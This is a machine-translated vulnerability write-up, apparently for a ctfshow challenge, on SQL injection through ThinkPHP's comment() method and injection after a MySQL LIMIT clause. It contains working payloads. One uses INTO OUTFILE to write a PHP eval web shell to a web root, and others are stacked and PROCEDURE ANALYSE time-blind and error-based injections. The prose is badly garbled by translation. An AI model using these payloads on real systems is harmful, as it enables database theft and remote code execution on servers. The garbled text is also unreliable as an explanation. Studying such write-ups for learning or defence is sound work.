Vulnerability Details

comment Function is used to query and comment , When executed sql When the sentence is , collocation comment There may be the use of annotations to Write shell perhaps Time blind note

Loophole recurrence

Controller write demo

$user = M('Users')->comment($id)->find(intval($id));

payload

?id=1*/ into outfile "/var/www/html/3.php" LINES STARTING BY '<?php eval($_POST[0]);?>'/*

Vulnerability analysis

First look at the function call stack

Start follow-up commissioning

To follow up comment function

to $options add comment It's what we brought in

The intermediate process is the same as thinkphp 3.2.3find Injection process analysis is the same , Go down here select Method

To follow up , Yes $options Medium model and bind To operate , No effect

To follow up buildSelectSql() Begin to build sql sentence

To follow up parseSql()
analysis $options Medium comment

To follow up

We introduced comment Added to the comment , You can inject by closing the pre - and post annotation

Try it first

Tectonic sql The statement injection point is LIMIT 1 In the back , in other words

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT [ Injection point ]

So how to make use of this ？

Stack time blind

Local tests can try Stack injection mode for time blind injection

1*/;select if(substr(database(),1,1)='s',sleep(3),0)/*

ctfshow Under the topic environment

LIMIT after Injection method

Mysql Next Limit Injection method | Farewell song (leavesongs.com)

Mysql The injection point is limit The utilization method behind the keyword - On that day ws

This method is applicable to MySQL 5.x in , stay limit Injection after statement

First of all to see select usage

SELECT
    [ALL | DISTINCT | DISTINCTROW ]
      [HIGH_PRIORITY]
      [STRAIGHT_JOIN]
      [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
      [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
    select_expr [, select_expr ...]
    [FROM table_references
    [WHERE where_condition]
    [GROUP BY {col_name | expr | position}
      [ASC | DESC], ... [WITH ROLLUP]]
    [HAVING where_condition]
    [ORDER BY {col_name | expr | position}
      [ASC | DESC], ...]
    [LIMIT {[offset,] row_count | row_count OFFSET offset}]   // here 
    [PROCEDURE procedure_name(argument_list)]
    [INTO OUTFILE 'file_name' export_options
      | INTO DUMPFILE 'file_name'
      | INTO var_name [, var_name]]
    [FOR UPDATE | LOCK IN SHARE MODE]]

According to the article Yes Two ways
limit Keyword followed by PROCEDURE and INTO keyword ,INTO Keywords can be used to write files when they have write permission , Take a look here PROCEDURE keyword .MySQL The only stored procedures available by default are ANALYSE (doc)

PROCEDURE

An error injection ,payload

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
 
ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

Time blind note

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

INTO

Try to make use of into outfile Write shell although dumpfile You can also write files, but because dumpfile There are no additional parameters (export_options) This is into outfile The key to utilization

Take a look at the following parameters

SELECT ... INTO OUTFILE 'file_name'
        [CHARACTER SET charset_name]
        [export_options]

export_options:
    [{FIELDS | COLUMNS}
        [TERMINATED BY 'string']// Separator 
        [[OPTIONALLY] ENCLOSED BY 'char']
        [ESCAPED BY 'char']
    ]
    [LINES
        [STARTING BY 'string']
        [TERMINATED BY 'string']
    ]

OPTION Parameters are optional parameter options , The possible values are ：

`FIELDS TERMINATED BY ' character string '`： Set the string as the separator between fields , It can be single or multiple characters . The default value is “\t”.

`FIELDS ENCLOSED BY ' character '`： Set the character to enclose the value of the field , Can only be a single character . By default, no symbols are used .

`FIELDS OPTIONALLY ENCLOSED BY ' character '`： Set the character to enclose CHAR、VARCHAR and TEXT Equal character field . By default, no symbols are used .

`FIELDS ESCAPED BY ' character '`： Set escape character , Can only be a single character . The default value is “\”.

`LINES STARTING BY ' character string '`： Set the character at the beginning of each line of data , It can be single or multiple characters . By default, no characters are used .

`LINES TERMINATED BY ' character string '`： Set the character at the end of each line of data , It can be single or multiple characters . The default value is “\n”.

give payload

/?id=1*/ into outfile "/var/www/html/3.php" LINES STARTING BY '<?php eval($_POST[0]);?>'/*